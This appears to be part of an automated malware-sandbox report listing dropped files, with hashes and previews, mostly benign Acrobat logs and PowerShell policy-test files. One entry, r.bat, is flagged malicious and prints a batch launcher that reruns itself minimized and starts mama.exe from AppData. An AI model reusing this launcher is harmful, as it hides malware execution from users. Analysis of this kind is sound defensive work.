                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.4.:.0.8.:.0.3. .=.=.=.....

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i22s0wj.bxj.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bzi3qvxt.ckn.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3u0zfd3.vuz.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqgqjgsl.5ca.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj12fnnf.lxl.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz4d1rb5.v45.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xln5mf1s.ufa.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzpmxiyv.ucr.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-27 04-07-57-726.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.386483451061953
                                                                      Encrypted:false
                                                                      SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                      MD5:F49CA270724D610D1589E217EA78D6D1
                                                                      SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                      SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                      SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                      Malicious:false
                                                                      Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.348230321095999
                                                                      Encrypted:false
                                                                      SSDEEP:384:3Sk7D9i7Z+31ecYtfk7KuFc/rxkmcthKkHlhrXboenLLRYZKkN6E8x8xUd3qMRJz:QW5
                                                                      MD5:F67EB2D9536626EE4820C7B86893184E
                                                                      SHA1:ED8ED076DC87A44352469F33B635E1B4D7E47226
                                                                      SHA-256:ED88DB405C5F2C0E528589ED314A60116C4A718A2C52CB622F33E7EECA1E71A7
                                                                      SHA-512:18E6EA92B4EB62C7BC5545FF3FEBA89E5783453BE5B889F74EF47558A6A9090477AC36DDB60E092FBAF9887EB548F171DC33957ECA9864C60F28EB98BF4D8FEE
                                                                      Malicious:false
                                                                      Preview:SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:802-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:819-0500 ThreadID=8048 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:819-0500 ThreadID=8048 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:820-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:823-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="SetConf

                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):35721
                                                                      Entropy (8bit):5.409047487043618
                                                                      Encrypted:false
                                                                      SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gR/:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRJ
                                                                      MD5:0E4FC5713C83B5D2EA3107E4B8CEDF02
                                                                      SHA1:E83718C25FD771D5D9182904AD67CD18157CC530
                                                                      SHA-256:5FDCC383EAB92122C63E150457AA7D990E32F3A0DEDFD306F8898F5C2BAEF104
                                                                      SHA-512:13BCED3D12E26C8EC2930EF051ABEC9D198631FA662DFAB97B88850C9677AF9FD2C16809B626ED55B7291302552E57A41A64BBC1CA3F07C7BCDFB22ED23C971F
                                                                      Malicious:false
                                                                      Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\48603851-717e-47ee-9f62-0bbbf667cac1.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\4bbcca4b-9f83-4f3a-b646-01623e3fdf41.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                      MD5:3A49135134665364308390AC398006F1
                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                      Malicious:false
                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\d9446379-f321-4b0b-8a73-bebcdb70bc89.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                      Category:dropped
                                                                      Size (bytes):386528
                                                                      Entropy (8bit):7.9736851559892425
                                                                      Encrypted:false
                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                      Malicious:false
                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                      C:\Users\user\AppData\Local\Temp\acrocef_low\eb79f6d8-16c9-41bf-beda-7b49adaefcf6.tmp

                                                                      Download File
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                      Category:dropped
                                                                      Size (bytes):1419751
                                                                      Entropy (8bit):7.976496077007677
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/ewYIGNPhmOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:GwZG3bWLxBGZN3mlind9i4ufFXpAXkru
                                                                      MD5:49B6EBA4436ED24E5352E7E7B99E7F24
                                                                      SHA1:284FA9437DDF60C3F4B345A52057DAAD6771E572
                                                                      SHA-256:1D65C0CFD6A2B7AF7FBBFBB4977F69CE61053C4F3D6B6F2D5D371FDF4A0D024D
                                                                      SHA-512:49CCCC0EEAAE481D5A53AB0C5E7504B0A3ECAC406E0626540C4BA5E13F5A7A8ED11E676572DB3BFFC015FD60702D9ED192FED65D2D16112934E53155EEA0BCB7
                                                                      Malicious:false
                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                      C:\Users\user\AppData\Local\Temp\r.bat

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):150
                                                                      Entropy (8bit):4.93838834787619
                                                                      Encrypted:false
                                                                      SSDEEP:3:CxKbbYx32/r4lwxQVLX65RSvWKTn0nacwREaKC5WjvdMRSvy:Cx+bYc/gwa+5UvrncNwiaZ5QFMUvy
                                                                      MD5:C6247F2A11070E648EBC86DE79468597
                                                                      SHA1:ECC3825B821B01CF1F0ED118D88BD5CD0D82C63E
                                                                      SHA-256:B07DD04040A2D4808D9003D884FEBA52CD43D508046BAACCA07FDBB753F12197
                                                                      SHA-512:4911BF7866C1A35FBF3650B5968970FF3DA800E8A4A03D9BC4609615323A0CAA76D306E9ADFD3A094BB81AB6402CC12E131B44998A0911AA05AC8C4FC3B0A176
                                                                      Malicious:true
                                                                      Preview:if not DEFINED IS_MNMZD set IS_MNMZD=1 && start "" /min "%~dpnx0" %* && exit ..start /min C:\Users\user\AppData\Roaming\mama.exe && exit ..exit..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6225
                                                                      Entropy (8bit):3.7520878012178533
                                                                      Encrypted:false
                                                                      SSDEEP:48:Vv2Qb+2C3U20DaukvhkvklCywg26nxPl6wSogZoRJ7JaW6nxPlJwSogZoRJ7JO1:wQq2Ckr3kvhkvCCtD6nxPYH86nxPhHP
                                                                      MD5:9267231D0E6AFA9B4EEE244E20C55FAF
                                                                      SHA1:B41F71F914FB29F35EEE967EA7337805E37CAB87
                                                                      SHA-256:8515789EABE6C68244D75C8B99182791763F96980E16E071F2A4D9E230DC609E
                                                                      SHA-512:3F53C4575628A9B4DC3A7111DEE0C65AF3791ED5E6A594091605EA5AA281C03D5D7D66C2C1F2A1CF5E4F69EC48D58B76C28F5C814C21E9FA9315816F9107D828
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. .....*_.......6X..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...\...6X..g...6X......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.@..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.@..Roaming.@......EW.=.Y.@.............................R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.@..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=EW.>...........................]..W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=EW.>....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=EW.>....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.@....9...........

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LZ5BWNM1PD3F1UF67X62.temp

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6225
                                                                      Entropy (8bit):3.7520878012178533
                                                                      Encrypted:false
                                                                      SSDEEP:48:Vv2Qb+2C3U20DaukvhkvklCywg26nxPl6wSogZoRJ7JaW6nxPlJwSogZoRJ7JO1:wQq2Ckr3kvhkvCCtD6nxPYH86nxPhHP
                                                                      MD5:9267231D0E6AFA9B4EEE244E20C55FAF
                                                                      SHA1:B41F71F914FB29F35EEE967EA7337805E37CAB87
                                                                      SHA-256:8515789EABE6C68244D75C8B99182791763F96980E16E071F2A4D9E230DC609E
                                                                      SHA-512:3F53C4575628A9B4DC3A7111DEE0C65AF3791ED5E6A594091605EA5AA281C03D5D7D66C2C1F2A1CF5E4F69EC48D58B76C28F5C814C21E9FA9315816F9107D828
                                                                      Malicious:false
